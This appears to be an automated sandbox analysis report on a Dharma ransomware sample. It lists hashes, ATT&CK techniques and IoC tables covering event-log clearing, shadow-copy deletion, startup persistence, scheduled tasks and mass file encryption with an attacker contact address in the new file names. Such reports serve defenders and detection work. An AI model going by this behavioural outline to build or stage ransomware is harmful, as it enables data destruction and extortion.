dharma | 72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2

General

Target

30e1234ef3e570667526fdb006832b12.exe
Size

913KB
MD5

30e1234ef3e570667526fdb006832b12
SHA1

01de8ba945945b58824f69553ac0f7b048645d45
SHA256

72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2
SHA512

00bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e
SSDEEP

24576:Utp7PNBIIr2i1VzBPZYpoEjH2NzQufi9Re+SfM+:uPSiJP+BH2NQufire+SfM+

Score

10^/10

dharma discovery evasion ransomware

Malware Config

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
2804	wevtutil.exe
1668	wevtutil.exe
3724	wevtutil.exe
1088	wevtutil.exe
4820	wevtutil.exe
1396	wevtutil.exe
4220	wevtutil.exe
432	wevtutil.exe
1792	wevtutil.exe
4516	wevtutil.exe
1308
1484	wevtutil.exe
1444
4240
4240	wevtutil.exe
1728
2212	wevtutil.exe
3904	wevtutil.exe
2432	wevtutil.exe
972	wevtutil.exe
1884	wevtutil.exe
3280	wevtutil.exe
4268	wevtutil.exe
2904	wevtutil.exe
952	wevtutil.exe
3232	wevtutil.exe
1332	wevtutil.exe
3996	wevtutil.exe
3280
3996	wevtutil.exe
5004
4360
1112	wevtutil.exe
692	wevtutil.exe
3376	wevtutil.exe
2696	wevtutil.exe
4052	wevtutil.exe
4600	wevtutil.exe
2012	wevtutil.exe
2840	wevtutil.exe
1704	wevtutil.exe
1604	wevtutil.exe
5116	wevtutil.exe
888	wevtutil.exe
4892	wevtutil.exe
4544	wevtutil.exe
372	wevtutil.exe
4804	wevtutil.exe
4272	wevtutil.exe
2844	wevtutil.exe
4880
840	wevtutil.exe
2904	wevtutil.exe
2432	wevtutil.exe
928	wevtutil.exe
4668
4396	wevtutil.exe
3680	wevtutil.exe
1324	wevtutil.exe
812
3772	wevtutil.exe
1684	wevtutil.exe
928	wevtutil.exe
5020	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (7903) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

1596 icacls.exe

pid	process
1596	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

30e1234ef3e570667526fdb006832b12.exe

description	ioc	process
File opened (read-only)	\??\Q:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\S:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\T:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\W:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\L:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\M:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\B:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\Z:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\F:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\A:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\Y:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\N:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\U:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\X:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\E:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\G:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\K:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\O:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\P:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\R:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\V:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\H:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\I:	30e1234ef3e570667526fdb006832b12.exe
File opened (read-only)	\??\J:	30e1234ef3e570667526fdb006832b12.exe

Drops file in Program Files directory 64 IoCs

Processes:

30e1234ef3e570667526fdb006832b12.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash_11@2x-lic.gif.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\ext\jfxrt.jar.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.SETLANG.16.1033.hxn.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xsl.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-ppd.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ppd.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\REFSPCL.TTF.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es.gif.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_unshare_18.svg.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\CompressCheckpoint.mpeg2.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_EnterpriseSub_Bypass30-ppd.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.png.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELM.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\es-419.pak.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\VOLTAGE.WAV.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-pl.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\FA000000009.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp4-ul-phn.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-ul-oob.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-ul-phn.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\AugLoop\bundle.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\comment.svg.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.schema.mfl.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.schema.mfl.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\TelemetryLog.xltx.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-pl.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewCommentRTL.png.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\Logo.png.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\giflib.md.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-pl.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder_18.svg.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\identity_helper.Sparse.Canary.msix.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Grace-ul-oob.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\ui-strings.js.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\PackageManagementDscUtilities.psm1.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer_eula.txt.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ONINTL.DLL.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif.id-F3AA16D8.[decryptioner@uncryptfile.com].HARMA	30e1234ef3e570667526fdb006832b12.exe

Drops file in Windows directory 1 IoCs

Processes:

30e1234ef3e570667526fdb006832b12.exe

description ioc process

File created C:\Windows\HRMPRIV 30e1234ef3e570667526fdb006832b12.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

816 sc.exe
4544 sc.exe
4336 sc.exe
320 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4336 schtasks.exe
4564 schtasks.exe
4220 schtasks.exe
3296 schtasks.exe
4268 schtasks.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1900 taskkill.exe
1772 taskkill.exe
3028 taskkill.exe
4832 taskkill.exe
2336 taskkill.exe
Runs net.exe

description	ioc	process
File created	C:\Windows\HRMPRIV	30e1234ef3e570667526fdb006832b12.exe

pid	process
816	sc.exe
4544	sc.exe
4336	sc.exe
320	sc.exe

pid	process
4336	schtasks.exe
4564	schtasks.exe
4220	schtasks.exe
3296	schtasks.exe
4268	schtasks.exe

pid	process
1900	taskkill.exe
1772	taskkill.exe
3028	taskkill.exe
4832	taskkill.exe
2336	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

30e1234ef3e570667526fdb006832b12.exe

pid	process
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe
2068	30e1234ef3e570667526fdb006832b12.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exevssvc.exewevtutil.exewevtutil.exewevtutil.exeattrib.exereg.execmd.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeIncreaseQuotaPrivilege	624
Token: SeSecurityPrivilege	624
Token: SeTakeOwnershipPrivilege	624
Token: SeLoadDriverPrivilege	624
Token: SeSystemProfilePrivilege	624
Token: SeSystemtimePrivilege	624
Token: SeProfSingleProcessPrivilege	624
Token: SeIncBasePriorityPrivilege	624
Token: SeCreatePagefilePrivilege	624
Token: SeBackupPrivilege	624
Token: SeRestorePrivilege	624
Token: SeShutdownPrivilege	624
Token: SeDebugPrivilege	624
Token: SeSystemEnvironmentPrivilege	624
Token: SeRemoteShutdownPrivilege	624
Token: SeUndockPrivilege	624
Token: SeManageVolumePrivilege	624
Token: 33	624
Token: 34	624
Token: 35	624
Token: 36	624
Token: SeIncreaseQuotaPrivilege	624
Token: SeSecurityPrivilege	624
Token: SeTakeOwnershipPrivilege	624
Token: SeLoadDriverPrivilege	624
Token: SeSystemProfilePrivilege	624
Token: SeSystemtimePrivilege	624
Token: SeProfSingleProcessPrivilege	624
Token: SeIncBasePriorityPrivilege	624
Token: SeCreatePagefilePrivilege	624
Token: SeBackupPrivilege	624
Token: SeRestorePrivilege	624
Token: SeShutdownPrivilege	624
Token: SeDebugPrivilege	624
Token: SeSystemEnvironmentPrivilege	624
Token: SeRemoteShutdownPrivilege	624
Token: SeUndockPrivilege	624
Token: SeManageVolumePrivilege	624
Token: 33	624
Token: 34	624
Token: 35	624
Token: 36	624
Token: SeBackupPrivilege	4460	vssvc.exe
Token: SeRestorePrivilege	4460	vssvc.exe
Token: SeAuditPrivilege	4460	vssvc.exe
Token: SeDebugPrivilege	2336
Token: SeDebugPrivilege	1900
Token: SeDebugPrivilege	1772	wevtutil.exe
Token: SeSecurityPrivilege	4084	wevtutil.exe
Token: SeBackupPrivilege	4084	wevtutil.exe
Token: SeSecurityPrivilege	928	wevtutil.exe
Token: SeBackupPrivilege	928	wevtutil.exe
Token: SeSecurityPrivilege	4556
Token: SeBackupPrivilege	4556
Token: SeSecurityPrivilege	3184	attrib.exe
Token: SeBackupPrivilege	3184	attrib.exe
Token: SeSecurityPrivilege	4392	reg.exe
Token: SeBackupPrivilege	4392	reg.exe
Token: SeSecurityPrivilege	2040	cmd.exe
Token: SeBackupPrivilege	2040	cmd.exe
Token: SeSecurityPrivilege	3640	wevtutil.exe
Token: SeBackupPrivilege	3640	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

30e1234ef3e570667526fdb006832b12.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2068 wrote to memory of 3352	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 3352	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 3352	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 3352 wrote to memory of 3296	3352	cmd.exe	schtasks.exe
PID 3352 wrote to memory of 3296	3352	cmd.exe	schtasks.exe
PID 3352 wrote to memory of 3296	3352	cmd.exe	schtasks.exe
PID 2068 wrote to memory of 4548	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 4548	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 4548	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 740	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 740	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 740	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2712	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2712	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2712	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2712 wrote to memory of 4268	2712	cmd.exe	schtasks.exe
PID 2712 wrote to memory of 4268	2712	cmd.exe	schtasks.exe
PID 2712 wrote to memory of 4268	2712	cmd.exe	schtasks.exe
PID 2068 wrote to memory of 2544	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2544	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
